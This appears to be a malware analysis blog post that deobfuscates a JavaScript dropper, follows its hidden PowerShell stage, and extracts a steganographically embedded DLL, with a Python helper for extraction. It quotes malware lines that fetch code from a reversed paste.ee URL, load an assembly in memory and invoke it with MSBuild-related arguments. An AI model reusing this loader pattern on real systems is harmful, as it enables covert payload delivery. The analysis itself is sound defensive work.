[REPORT] Malware Analysis of an interesting sample
On April 26, Simplicio Liberatore (Malware Analyst at Leonardo) posted this:

The link is to a Twitter post that gives us even more information, sharing the image with the embedded malware, a screenshot of the initial JS file and a snapshot of a loader function.
We have a lot of info, but I still think that as an exercise it is useful to retrace the analysis and write about it more in depth. So let’s start:
From the Twitter post we can get the sample: https://bazaar.abuse.ch/sample/dff785934fc4c39f05e39e8abde6a033c81ede6d0435d99d7477c78b2ef2f50d/
Let’s take a quick look at the file.

The file is pretty big and it looks like a repetition of the same code over and over. In addition, the code doesn’t seem to do much. It’s probably an obfuscation technique. My first idea was to identify the repeated parts and simply remove them with a replace script, but while I was playing around with the file I happened to open it with Geany, which conveniently had the “Symbols” tab open for me to see:

I scrolled through and Aha! There are some variables that are used very sparsely, which is a big contrast to the useless ones repeated often. These variables are all more or less in the same area, and if we go and look at them we can see that they are not used for the obfuscation of the JS file but for something else. At this point I extracted all the lines that seemed interesting and reconstructed the deobfuscated (for now) script.

Still, as we can see, the variables have something funky going on, in particular the use of Unicode characters to make everything hard to read. This is not a hard problem to solve: in the code we can see two “replace” methods called on the variables that remove the Unicode strings. If we apply those replacements manually, we obtain a much cleaner script.

Now it’s much cleaner. The first line, which is cut off in the screenshot, contains base64-encoded data, as confirmed by the “FromBase64String” call seen below it. Even without knowing much JavaScript we can guess what is happening: the script runs (line 11) a shell (line 10) that executes hidden PowerShell (line 8) with the contents of the variable “furled”. So what we expect in furled is a PowerShell script, and here it is after base64 decoding.

(In the screenshot some deobfuscation has already been applied, so the original script after base64 decoding might be slightly different… I forgot to screenshot it ☺)
So, what do we have here? The bulk of the script downloads an image and tries to extract something from it: a base64 string between two placeholders («BASE64_START» and «BASE64_END»). If we open the image with a hex editor we can see that the base64 string occupies more than half of the image.

We can write a script to extract the base64 string, which can then be decoded. What we obtain is a DLL, as can be seen from the MZ magic number and from the Characteristics flag set in the file header.
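As an added example (not the author's script), the extraction and header check described above in Python: the two markers are the ones quoted from the analysed PowerShell stage, while the image bytes and the DLL stub are constructed placeholders rather than the real sample.

```python
import base64
import re
import struct

# Delimiters quoted from the analysed PowerShell stage; the image bytes and the
# DLL stub below are constructed placeholders, not the real sample.
START = "«BASE64_START»".encode("utf-8")
END = "«BASE64_END»".encode("utf-8")
IMAGE_FILE_DLL = 0x2000  # Characteristics bit that marks a PE image as a DLL


def extract_payload(image: bytes) -> bytes:
    """Return the decoded bytes hidden between the two markers in an image."""
    s = image.find(START)
    e = image.find(END, s + len(START)) if s != -1 else -1
    if s == -1 or e == -1:
        raise ValueError("markers not found")
    blob = re.sub(rb"\s+", b"", image[s + len(START):e])  # tolerate line breaks
    return base64.b64decode(blob, validate=True)


def describe_pe(data: bytes) -> dict:
    """Check the MZ and PE magic and read Characteristics from the file header."""
    info = {"mz": data[:2] == b"MZ", "pe": False, "dll": False, "characteristics": None}
    if not info["mz"] or len(data) < 0x40:
        return info
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0" or len(data) < e_lfanew + 24:
        return info
    info["pe"] = True
    # IMAGE_FILE_HEADER follows the 4-byte signature; Characteristics is its
    # last field, 18 bytes into the header (so 22 bytes after "PE\0\0").
    chars = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    info["characteristics"] = chars
    info["dll"] = bool(chars & IMAGE_FILE_DLL)
    return info


def build_sample_image() -> bytes:
    """Constructed test input: PNG-like junk with a minimal DLL-shaped stub embedded."""
    stub = bytearray(0x80)
    stub[:2] = b"MZ"
    struct.pack_into("<I", stub, 0x3C, 0x40)   # e_lfanew -> "PE\0\0" at 0x40
    stub[0x40:0x44] = b"PE\0\0"
    # EXECUTABLE_IMAGE (0x0002) | LARGE_ADDRESS_AWARE (0x0020) | DLL (0x2000)
    struct.pack_into("<H", stub, 0x40 + 22, 0x2022)
    b64 = base64.b64encode(bytes(stub))
    return (b"\x89PNG\r\n\x1a\n" + b"\x00" * 16 + START
            + b64[:40] + b"\r\n" + b64[40:] + END + b"\xff" * 8)
```

Running `describe_pe(extract_payload(build_sample_image()))` reports the MZ and PE magic as present and the DLL bit set; on the real image the same two functions would be pointed at the downloaded file instead of the constructed one.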

If we submit this file to VirusTotal, it is widely flagged as malicious, but mostly under generic names. Zusy comes up a lot (though this is sometimes generic too), and in general we can guess this DLL is trying to do some UAC bypassing and inject the real malware. DiE (Detect It Easy) says it is a VB.NET executable.
Let's go back to the PowerShell script.
$smudgy = '0/fbbGSDXs/d/ee.etsap//:ptth';   # reversed paste.ee URL
# ...
$truncature = [System.Reflection.Assembly]::Load($abbasi);   # load the extracted DLL from memory
$alining = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($smudgy,'1','C:\Users\Public\Downloads','charoset','MSBuild','','','','','','','js','','','','2',''))
The final act of the script is calling the “VAI” method from the just-loaded DLL, passing it an array containing various info: a reversed link to paste.ee, a path to the Public Downloads folder, “MSBuild” (a build tool) and some as yet unidentified strings. Let's open up dnSpy and see what this file is doing.
By opening dnlib.IO.Home and looking at the “VAI” signature we can see what parameters have been passed:

We can guess the original malware writer is Portuguese-speaking (“caminho” means path), and not much else without looking at the function implementation.
Work in progress…